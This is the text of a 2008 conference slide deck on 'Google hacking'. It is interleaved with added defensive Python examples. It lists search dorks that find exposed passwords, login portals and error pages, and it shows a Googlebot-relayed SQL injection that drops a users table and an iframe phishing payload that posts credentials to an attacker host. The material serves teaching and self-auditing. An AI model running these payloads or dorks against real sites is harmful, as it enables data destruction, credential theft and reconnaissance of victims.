Dirty Attacks with Google Hacking Prathan Phongthiproek ACIS Professional Center Information Security Consultant – Penetration Tester November 16th, 2008

CITEC #CON2-Dirty Attack with Google Hacking

Page 1: CITEC #CON2-Dirty Attack with Google Hacking

Dirty Attacks with Google Hacking

Prathan Phongthiproek ACIS Professional Center Information Security Consultant – Penetration Tester November 16th, 2008

Page 2: CITEC #CON2-Dirty Attack with Google Hacking

What I’ve done ?!

  Penetration Testing (BlackBox and WhiteBox)

  Security Consultant ( I Hate this job !!)

  Active Security Researcher

  Devoted Hacker

  Exploits and Vulnerabilities Disclosure (CWH Underground)

  Tools: g00mail Enumerator, SQLFuzzer, 4ppCrawl3r, Spike Bot (Developing) Etc..

  Comments, Feedback ? >> [email protected]

(Don’t spam mail !! lol)

Dirty Attacks

With

Google hacking

What is Google Hacking?

What a Hacker Can do with vulnerable Web?

Google Hacking Database (GHDB)

--------------------------------

Google Hacking basics

Google Advanced Operators

--------------------------------

Locating Exploits and Finding Targets

Tracking Down Web Servers, Login Portals, etc..

Dirty Attacks using Googlebot

Google Hacking Tools

--------------------------------

# w
 03:19:18 up 1 min, 1 user, load average: 1.73, 0.71, 0.26
USER TTY FROM LOGIN@ IDLE JCPU PCPU
prathan phongthiproek tty1 - 03:18 0.00s 0.08s 0.01s

Page 3: CITEC #CON2-Dirty Attack with Google Hacking

What is Google Hacking ?!

  It is NOT hacking into Google!! (Hacking Google: Sidejacking, XSS Spreadsheet, etc)

  Google is much more than just a simple search interface and engine.

  Google hacking is the use of a search engine to locate a security vulnerability on the Internet

  Google crawls public websites for information using an automated search and record program called “Googlebot”.

  IRC Bot using Google Hacking to find Vulnerability and Exploits

  Refers to using the Google search engine in an effort to pull sensitive information, such as credit card numbers, out of a poorly constructed Web application

Page 4: CITEC #CON2-Dirty Attack with Google Hacking

What is Google Hacking ?!

  Johnny Long is the “grandfather” of Google hacking.

  His website http://johnny.ihackstuff.com is exclusively dedicated to Google Hacking and you will find all sorts of cool information there.

  Johnny Long wrote Google Hacking for Penetration Testers; ISBN 1597491764

Page 5: CITEC #CON2-Dirty Attack with Google Hacking

What a Hacker Can do with Vulnerable Web?

When an attacker knows the sort of vulnerability he wants to exploit but has no specific target, the best solution is “Dirty Google Search operators”

  File Inclusion (RFI, LFI)
  SQL Injection
  Remote Code Execution
  Arbitrary Add Admin
  Arbitrary File Upload
  XSS / XSRF
  Directory Listing
  Directory Traversal
  Source code disclosure
  Administrative Login Portals
  Web server Information
  Reveal Pathnames and Filenames
  Social Engineering (Damn !! How do you get my address)

Page 6: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking Database (GHDB)

We call them “googledorks”: Inept or foolish people as revealed by Google.

  Advisories and Vulnerabilities
  Error Messages that contain too much information
  Files containing usernames and passwords
  Footholds and juicy Info
  Pages containing login portals
  Pages containing network or vulnerability data
  Sensitive Directories
  Sensitive Online Shopping Info
  Vulnerable Files and Servers
  Web Server Detection

Page 7: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking Database (GHDB)

http://johnny.ihackstuff.com/ghdb.php

Page 8: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking Database (GHDB)

Pages containing login portals

Page 9: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking Database (GHDB)

intitle:"ColdFusion Administrator Login"

Page 10: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking Database (GHDB)

"ColdFusion Administrator Login"

Page 11: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking basics

Crawl Website Information with Caches

Page 12: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking basics

Using Google as a Proxy Server

Page 13: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking basics

Basic Search Operators

  Use the plus sign (+) to force a search for an overly common word
  Use the minus sign (-) to exclude a term from a search
  (|) / OR, admin | administrator
  To search for a phrase, supply the phrase surrounded by double quotes (" ")
  A period (.) serves as a single-character wildcard.
  An asterisk (*) represents any word - not the completion of a word, as is traditionally used
  Mixed searches can involve both phrases and individual terms

Page 14: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators

Advanced Search Operators

  filetype:
  info:
  define:
  intext:
  inurl:
  intitle:
  inanchor:
  link:
  site:
  stocks:
  cache:

Page 15: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators

Website Information Gathering – “site:www.amazon.com”

Page 16: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators

Subdomains Gathering – “site:amazon.com -site:www.amazon.com”

Page 17: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators

Website containing Error Message – “Error | Warning site:…”

Page 18: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators

Directory Listing – intitle:index.of admin

Page 19: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators

Directory Listing – intitle:index.of WS_FTP.LOG

Page 20: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators

Web server Information – intitle:index.of “Server at”

Page 21: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators

Administrative Login Portals – “admin login”

Page 22: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators

File robots.txt – “inurl:robots.txt”

Page 23: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators

Vulnerable File (Robpoll.cgi) – “inurl:robpoll.cgi filetype:cgi”

Page 24: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators

File containing password – “AutoCreate=TRUE password=*”

Page 25: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators

MS Access DB password – “inurl:admin mdb”

Page 26: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators

MS Access DB password – “inurl:admin mdb”

Page 27: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators

Password File – "index of /etc" passwd

Page 28: CITEC #CON2-Dirty Attack with Google Hacking

Google Advanced Operators

Crack / Keygen… – 94FBR software

Page 29: CITEC #CON2-Dirty Attack with Google Hacking

Locating Exploits and Finding Targets

Locating Exploits Via Common Code Strings

  Another way to locate exploit code is to focus on common strings within the source code itself

  One way to do this is to focus on common inclusions or header file references

  For example, many C programs include the standard input/output library functions, which are referenced by an include statement such as #include <stdio.h> within the source code

  A query like this would locate C source code that contained the word exploit, regardless of the file’s extension:

"#include <stdio.h>" exploit

Page 30: CITEC #CON2-Dirty Attack with Google Hacking

Locating Exploits and Finding Targets

Locating Exploits Via Common Code Strings

Page 31: CITEC #CON2-Dirty Attack with Google Hacking

Locating Exploits and Finding Targets

Locating Exploits Via Common Code Strings

Page 32: CITEC #CON2-Dirty Attack with Google Hacking

Locating Exploits and Finding Targets

Locating Targets Via Demonstration Pages

  Develop a query string to locate vulnerable targets on the Web; the vendor’s Website is a good place to discover what exactly the product’s Web pages look like

  For Example, some administrators might modify the format of a vendor-supplied Web page to fit the theme of the site

  These types of modifications can impact the effectiveness of a Google search that targets a vendor-supplied page format

  You can find that most sites look very similar and that nearly every site has a “Powered by” message at the bottom of the main page          

Page 33: CITEC #CON2-Dirty Attack with Google Hacking

Locating Exploits and Finding Targets

Locating Targets Via Source Code

  A hacker might use the source code of a program to discover ways to search for that software with Google

  To find the best search string to locate potentially vulnerable targets, you can visit the Web page of the software vendor to find the source code of the offending software

  In cases where source code is not available, an attacker might opt to simply download the offending software and run it on a machine he controls to get ideas for potential searches

Page 34: CITEC #CON2-Dirty Attack with Google Hacking

Locating Exploits and Finding Targets

Vulnerable Web Application Examples

Page 35: CITEC #CON2-Dirty Attack with Google Hacking

Locating Exploits and Finding Targets

Vulnerable Web Application Examples

Page 36: CITEC #CON2-Dirty Attack with Google Hacking

Locating Exploits and Finding Targets

Finding targets via “powered by” – “Powered By cubecart”

Page 37: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Login Portals, etc..

Query for “Microsoft-IIS/5.0 Server at”

Page 38: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Login Portals, etc..

IIS HTTP/1.1 Error Page Titles

Page 39: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Login Portals, etc..

Query for IIS 5.0 – intext:“404 Object Not Found” Microsoft IIS/5.0

Page 40: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Login Portals, etc..

Query for “Apache” “Server at” -intitle:index.of intitle:error

Page 41: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Login Portals, etc..

Apache 2.0 Error Pages

Page 42: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Login Portals, etc..

Default Pages for Web Servers

Page 43: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Login Portals, etc..

Outlook Web Access Default Portal – inurl:“exchange/logon.asp”

Page 44: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Login Portals, etc..

Windows Registry Entries Can Reveal Passwords – filetype:reg intext:"internet account manager"

Page 45: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Login Portals, etc..

Error Message for File Inclusion – "Warning: Failed opening"

Page 46: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Login Portals, etc..

Error Message for File Inclusion – "Warning: Failed opening"

Page 47: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Login Portals, etc..

Error Message for SQL Injection – “Microsoft OLE DB Provider for ODBC Drivers error”

Page 48: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Login Portals, etc..

Error Message for SQL Injection – “Microsoft OLE DB Provider for ODBC Drivers error”

Page 49: CITEC #CON2-Dirty Attack with Google Hacking

Tracking Down Web Servers, Login Portals, etc..

Error Message for XSS/XSRF – inurl:“error.asp?msg=”
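The operators and queries on the preceding slides can be turned into a self-audit: the added example below (not part of the original deck) evaluates a handful of the deck's queries against pages recorded from a crawl of your own site, so that pages a search engine could surface this way are found and fixed first. The `Page` records, the host `example.test`, the check labels and the simplified operator semantics (period as single-character wildcard and asterisk as any word, as stated on the basics slide) are assumptions of this example.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

@dataclass
class Page:                      # one record from a crawl of your own site
    url: str
    title: str
    text: str

@dataclass
class Term:
    negate: bool                 # leading '-' excludes the term
    field: str                   # intitle / inurl / intext / site / filetype / any
    value: str

TOKEN = re.compile(r'(\||\bOR\b)|(-)?(?:(intitle|inurl|intext|site|filetype):)?'
                   r'(?:"([^"]*)"|([^\s|]+))')

def parse(query):
    """Split a query into AND-ed groups, each a list of OR-ed Terms."""
    for fancy, plain in (("\u201c", '"'), ("\u201d", '"'), ("\u2013", "-")):
        query = query.replace(fancy, plain)      # undo slide typography
    groups, join_next = [], False
    for m in TOKEN.finditer(query):
        if m.group(1):                           # '|' or OR: extend previous group
            join_next = True
            continue
        value = m.group(4) if m.group(4) is not None else m.group(5)
        term = Term(bool(m.group(2)), m.group(3) or "any", value)
        if join_next and groups:
            groups[-1].append(term)
        else:
            groups.append([term])
        join_next = False
    return groups

def to_regex(value):
    """'.' matches any single character and '*' any word (simplified semantics)."""
    parts = ("." if c == "." else r"\S+" if c == "*" else re.escape(c) for c in value)
    return re.compile("".join(parts), re.IGNORECASE)

def term_hits(term, page):
    parsed = urlparse(page.url)
    host, want = (parsed.hostname or "").lower(), term.value.lower()
    if term.field == "site":                     # exact host or any subdomain of it
        hit = host == want or host.endswith("." + want)
    elif term.field == "filetype":
        hit = parsed.path.lower().endswith("." + want)
    else:                                        # no operator: search every field
        fields = {"intitle": page.title, "inurl": page.url, "intext": page.text}
        haystack = fields.get(term.field, "\n".join(fields.values()))
        hit = bool(to_regex(term.value).search(haystack))
    return hit != term.negate

def matches(query, page):
    return all(any(term_hits(t, page) for t in group) for group in parse(query))

def audit(pages, checks):
    """Map each exposed URL to the labels of the checks it matches."""
    report = {}
    for page in pages:
        found = [label for label, query in checks if matches(query, page)]
        if found:
            report[page.url] = found
    return report

# Queries as they appear in the deck; the labels and the site: host are assumptions.
CHECKS = [
    ("directory listing with server banner", 'intitle:index.of "Server at"'),
    ("server banner on error page", '"Apache" "Server at" -intitle:index.of intitle:error'),
    ("PHP include error", '"Warning: Failed opening"'),
    ("ODBC error", '"Microsoft OLE DB Provider for ODBC Drivers error"'),
    ("message echoed from URL", 'inurl:"error.asp?msg="'),
    ("verbose error text", "Error | Warning site:www.example.test"),
]

# Constructed sample crawl records (not real pages).
PAGES = [
    Page("https://www.example.test/backup/", "Index of /backup",
         "Parent Directory db.sql Apache/2.2.3 Server at www.example.test Port 80"),
    Page("https://www.example.test/report.cgi", "500 Internal Server Error",
         "The server encountered an internal error. "
         "Apache/2.2.3 Server at www.example.test Port 80"),
    Page("https://www.example.test/shop/cat.php?id=7", "Catalogue",
         "Warning: Failed opening 'inc/7.php' for inclusion in "
         "/var/www/shop/cat.php on line 12"),
    Page("https://intranet.example.test/error.asp?msg=Session+expired", "Notice",
         "Session expired"),
    Page("https://www.example.test/about.html", "About us", "We sell widgets."),
]

if __name__ == "__main__":
    for url, labels in audit(PAGES, CHECKS).items():
        print(url, "->", ", ".join(labels))
```

Each finding maps to a configuration fix on the server itself: disable directory indexes, suppress the server signature, and return generic error pages instead of interpreter or database messages.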

Page 50: CITEC #CON2-Dirty Attack with Google Hacking

Dirty Attacks using Googlebot

Googlebot, Google’s Web Crawler

<a href=http://www.mict.go.th>MICT</a>

Page 51: CITEC #CON2-Dirty Attack with Google Hacking

Dirty Attacks using Googlebot

Google’s Query Processor

Page 52: CITEC #CON2-Dirty Attack with Google Hacking

Dirty Attacks using Googlebot

SQL Injection via Googlebot

We search Google for one of these signatures: inurl:".asp?id=", inurl:"?name=", "Microsoft OLE DB Provider for SQL Server"

Finding the link: http://www.hackme.com/cat.asp?ID=1

Create the file test.html the code is:

<html> <a href="http://www.hackme.com/cat.asp?ID=1+drop+table+'users'--">Click Here</a> </html>

Page 53: CITEC #CON2-Dirty Attack with Google Hacking

Dirty Attacks using Googlebot

SQL Injection via Googlebot

Then upload to: http://www.mysite.com/test.html

After a few days GoogleBot will index the file: http://www.mysite.com/test.html

Then index the link “Click Here” inside the file: http://www.hackme.com/cat.asp?ID=1+drop+table+'users'--

The application SQL query is: SELECT Username FROM users WHERE ID=1 drop table 'users'--

The Result: The table “users” has been deleted, thanks to Google
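The crawler only delivers the request; the outcome on this slide depends on the application pasting the ID parameter into its SQL text. The following is an added example, not part of the original slides: Python with an in-memory SQLite table standing in for the ASP application (function names and the sample row are assumptions), showing the query text the vulnerable pattern builds from the crawled link and a handler that rejects it before it reaches the database.

```python
import sqlite3
from urllib.parse import urlsplit, parse_qs

# The crawled link from the slide, with ASCII quotes and "--" restored.
CRAWLED_URL = "http://www.hackme.com/cat.asp?ID=1+drop+table+'users'--"

def id_param(url):
    """Return the decoded ID query parameter ('+' decodes to a space)."""
    return parse_qs(urlsplit(url).query).get("ID", [""])[0]

def query_vulnerable(url):
    """Vulnerable pattern: the parameter is concatenated into the SQL text."""
    return "SELECT Username FROM users WHERE ID=" + id_param(url)

def handle_hardened(conn, url):
    """Hardened pattern: strict integer check, then a bound parameter."""
    raw = id_param(url)
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        return 400, None          # rejected, the database is never touched
    row = conn.execute(
        "SELECT Username FROM users WHERE ID = ?", (int(raw),)
    ).fetchone()
    return (200, row[0]) if row else (404, None)

def make_db():
    """Constructed sample data standing in for the application's table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (ID INTEGER PRIMARY KEY, Username TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice')")
    return conn

def users_table_exists(conn):
    """True while the users table is still present."""
    return conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE type='table' AND name='users'"
    ).fetchone()[0] == 1

if __name__ == "__main__":
    db = make_db()
    print(query_vulnerable(CRAWLED_URL))
    print(handle_hardened(db, CRAWLED_URL), users_table_exists(db))
    print(handle_hardened(db, "http://www.hackme.com/cat.asp?ID=1"))
```

The same check applies whatever the client is: a request arriving from a search-engine crawler is handled exactly like any other untrusted request.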

Page 54: CITEC #CON2-Dirty Attack with Google Hacking

Dirty Attacks using Googlebot

Google’s Query Processor

<a href="http://www.hackeme.com/cat.asp?ID=1+drop+table+'users'--">Click Here</a>

<a href="http://www.hackeme.com/cat.asp?ID=1+drop+table+'users'--">Click Here</a>

/cat.asp?ID=1+drop+table+'users'--

Page 55: CITEC #CON2-Dirty Attack with Google Hacking

Dirty Attacks using Googlebot

Cross Site Framing via Googlebot

We search Google for one of these signatures: inurl:".asp?msg=", inurl:".asp?title=", ..

We find the link: http://www.CITEC.com/bank/Login.asp?MsgError=Access denied

Create the file 1.html the code is:

<html>
<title>CITEC Bank | Login CITEC | CITEC Account</title>
<a href="http://www.CITEC.com/bank/Login.asp?MsgError=<iframe src='http://www.social.com/2.html'></iframe>">CITEC Bank</a>
</html>

Page 56: CITEC #CON2-Dirty Attack with Google Hacking

Dirty Attacks using Googlebot

Cross Site Framing via Googlebot

And the file 2.html:

<form method="post" action="http://www.social.com/1.php">
Username: <input type="text" name="user"><br>
Password: <input type="password" name="pass">
<input type="submit" value="Send">
</form>

Then upload all the files to: http://www.social.com/

Page 57: CITEC #CON2-Dirty Attack with Google Hacking

Dirty Attacks using Googlebot

Cross Site Framing via Googlebot

After a few days GoogleBot will index the file: http://www.social.com/1.html

Then it will index the link “CITEC Bank” (within the file):

http://www.CITEC.com/bank/Login.asp?MsgError=<iframe src='http://www.social.com/2.html'></iframe>

Page 58: CITEC #CON2-Dirty Attack with Google Hacking

Dirty Attacks using Googlebot

Cross Site Framing via Googlebot

Users who search for “CITEC Bank” will find the above link, and when they follow it they will see this form:

The Result: Many users are manipulated by the attacker, who uses Google to execute a phishing attack (with XSS).
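The framing works only because Login.asp writes the MsgError parameter into the page as markup. The following is an added example, not part of the original slides: a Python sketch of the reflection point (the message table and function names are assumptions), with the vulnerable rendering beside two hardened ones, an allowlist of fixed messages and HTML output encoding.

```python
import html
from urllib.parse import urlsplit, parse_qs

# The indexed link from the slides, with ASCII quotes restored.
INDEXED_URL = ("http://www.CITEC.com/bank/Login.asp?MsgError="
               "<iframe src='http://www.social.com/2.html'></iframe>")
BENIGN_URL = "http://www.CITEC.com/bank/Login.asp?MsgError=Access+denied"

# Hypothetical set of messages the login page is allowed to display.
ALLOWED_MESSAGES = {"Access denied", "Session expired"}

def msg_error(url):
    """Return the decoded MsgError query parameter."""
    return parse_qs(urlsplit(url).query).get("MsgError", [""])[0]

def render_vulnerable(url):
    """Vulnerable pattern: the parameter is written into the page as markup."""
    return "<p class='error'>" + msg_error(url) + "</p>"

def render_allowlisted(url):
    """Hardened: only known messages are shown, anything else is replaced."""
    text = msg_error(url)
    if text not in ALLOWED_MESSAGES:
        text = "Login failed"
    return "<p class='error'>" + html.escape(text, quote=True) + "</p>"

def render_encoded(url):
    """Hardened: free text is still shown, but HTML-encoded so it stays text."""
    return "<p class='error'>" + html.escape(msg_error(url), quote=True) + "</p>"

if __name__ == "__main__":
    for render in (render_vulnerable, render_allowlisted, render_encoded):
        print(render.__name__, "->", render(INDEXED_URL))
    print(render_allowlisted(BENIGN_URL))
```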

Page 59: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking Tools

Google Hacking Database (GHDB)

Page 60: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking Tools

Gooscan

Page 61: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking Tools

SiteDigger Tools

Page 62: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking Tools

Goolink – very handy for finding vulnerable sites that are wide open to Google and Googlebot

Page 63: CITEC #CON2-Dirty Attack with Google Hacking

Google Hacking Tools

GoolagScanner – enables auditing a website via Google

Page 64: CITEC #CON2-Dirty Attack with Google Hacking

Spike Bot – (By Me)

Google Links with Spike Bot

Page 65: CITEC #CON2-Dirty Attack with Google Hacking

How to Protect Against Google Hacking

  Keep sensitive data off the web

  Use common sense!! Basic security practices are all it takes. Defense in depth, act diligently when configuring web-based devices, and have a strong corporate security policy

  Use Google hacking techniques to uncover your own security problems. So…..Google hack yourself!

  Perform periodic Google Assessments
    – Update robots.txt
    – Use meta-tags: NOARCHIVE
    – http://www.google.com/remove.html

  Work with Google for help in removing security breaches. They are easy to work with and want to help! You can find contact info on their site
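One way to make the periodic assessment repeatable is to check your own site's robots.txt rules and NOARCHIVE meta tags against a list of pages that should stay out of search results. The following is an added example, not part of the original slides: the robots.txt text, the page bodies and the paths are constructed samples for a hypothetical site.

```python
from html.parser import HTMLParser
from urllib.robotparser import RobotFileParser

# Constructed samples: a robots.txt and two pages that should not be indexed.
ROBOTS_TXT = """\
User-agent: *
Disallow: /admin/
Disallow: /backup/
"""
PAGES = {
    "/admin/login.asp":
        '<html><head><meta name="robots" content="noindex, noarchive"></head></html>',
    "/reports/q3.html":
        "<html><head><title>Q3</title></head></html>",
}

class RobotsMeta(HTMLParser):
    """Collects directives from <meta name="robots" or "googlebot" ...> tags."""
    def __init__(self):
        super().__init__()
        self.directives = set()

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("name") or "").lower() in ("robots", "googlebot"):
            content = a.get("content") or ""
            self.directives |= {d.strip().lower() for d in content.split(",")}

def assess(robots_txt, pages, agent="Googlebot"):
    """Return {path: [findings]}; an empty list means both controls are in place."""
    rules = RobotFileParser()
    rules.parse(robots_txt.splitlines())
    report = {}
    for path, body in pages.items():
        meta = RobotsMeta()
        meta.feed(body)
        findings = []
        if rules.can_fetch(agent, path):
            findings.append("crawlable: no robots.txt rule covers this path")
        if "noarchive" not in meta.directives:
            findings.append("cacheable: no NOARCHIVE meta tag")
        report[path] = findings
    return report

if __name__ == "__main__":
    for path, findings in assess(ROBOTS_TXT, PAGES).items():
        print(path, "->", findings or "ok")
```

robots.txt is advisory and publicly readable, so these checks complement the first point on the slide (keeping sensitive data off the web) and do not replace it.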

Page 66: CITEC #CON2-Dirty Attack with Google Hacking

If someone is still in the room.. Q & A!

THANK YOU